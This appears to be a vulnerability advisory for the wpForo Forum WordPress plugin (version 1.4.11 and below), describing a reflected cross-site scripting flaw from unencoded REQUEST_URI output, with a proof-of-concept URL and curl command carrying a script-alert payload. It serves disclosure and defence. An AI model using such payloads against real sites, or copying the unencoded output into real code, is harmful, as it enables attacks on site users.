Description |
Version 1.4.11, and below, of the wpForo Forum WordPress Plugin were found to be vulnerable to Reflected Cross-Site Scripting (XSS). The vulnerability was due to the Plugin using the $_SERVER['REQUEST_URI'] PHP variable to create a URL string that was later output within HTML without any output encoding. |
Proof of Concept |
Click on the following link while using the Internet Explorer (IE) web browser, with the XSS filter disabled:
http://www.example.com/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
Alternatively, run the following cURL request and notice that the XSS payload is output within HTML, without any validation, or output encoding:
curl -s 'http://www.example.com/index.php/community/?"><script>alert(/XSS/)</script>' | grep "XSS"
|